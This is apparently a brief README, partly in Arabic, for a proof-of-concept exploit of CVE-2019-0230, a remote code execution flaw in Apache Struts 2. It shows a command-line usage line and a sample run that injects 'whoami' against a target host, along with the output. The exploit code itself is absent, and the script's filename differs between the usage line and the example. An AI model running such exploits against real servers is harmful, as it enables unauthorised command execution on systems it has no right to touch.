
إثبات مفهوم لاستغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد في Apache Struts 2، وهي CVE-2019-0230، مما يتيح حقن الأوامر عبر طلبات HTTP مصممة بعناية.
CVE-2019-0230 Exploit
هذا هو CVE-2019-0230 Exploit
python3 cve-2019-230.py <url or ip> <command>
مثال:
# python3 cve-2019-0230-poc.py pentest.com whoami
Testing pentest.com!
Command being passed for RCE: whoami
2020/10/22/